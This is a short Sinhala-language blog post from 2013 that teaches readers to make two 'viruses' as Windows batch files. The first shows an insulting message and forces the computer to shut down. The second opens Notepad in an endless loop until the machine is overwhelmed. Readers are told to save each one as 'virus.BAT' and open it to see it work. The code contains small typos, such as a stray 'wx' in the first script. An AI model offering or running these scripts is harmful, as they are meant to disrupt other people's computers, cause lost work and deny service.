Thursday, June 6, 2013

වයිරස් හදන ක්‍රම දෙකක්

වයිරස් හදන ක්‍රම දෙකක්

ඔන්න ඉතින් තවත් කුප්පියක් දෙන්නයි සූදානම.. අද දෙන්න හදන්නේ තවත් වයිරස් හදන ක්‍රම දෙකක්. මම මීට කලිනුත් ලිපි දෙකක් දුන්නනේ මෙව්වා ගැන නේද? අද ඔන්න තවත් එකක් දාන්න හදන්නේ..




එහෙනම් කෙලින්ම වැඩේට බහිමු නේද?


1.පරිගණකයක් Shut Down කරවමු.

wx@echo off
msg * I don't like you
shutdown -c Error! You are too stupid! -s

ඔන්න ඔය ටික Notepad එකක ටයිප් කරන්න. ඔය I don't like you කියලා තියන ටික වෙනුවට ඔයාලට අවශ්‍ය දෙයක් ටයිප් කරන්න. එතකොට ඕක ඕපන් කලාම ඒ මැසේජ් එක වැටිලා එකපාරටම පරිගණකය Off වෙනවා. ඒ කියන්නේ Force Shutdown එකක්. ඔය ෆයිල් එක සේව් කරගන්න ඕනා අන්තිමට .BAT කියලා දීලා.
උදා:-virus.BAT

2.නොනවත්වා Notepad එක ඕපන් කරවමු

@ECHO off
:top
START %SystemRoot%\system32
notepad.exe
GOTO top

ඔය ටිකත් අර කලින් වගේම Notepad එකක ටයිප් කරලා .BAT කියලා සේව් කරන්නයි තියෙන්නේ


virus eka wadada balanna open karala balannako :P =D


Like This Article ? :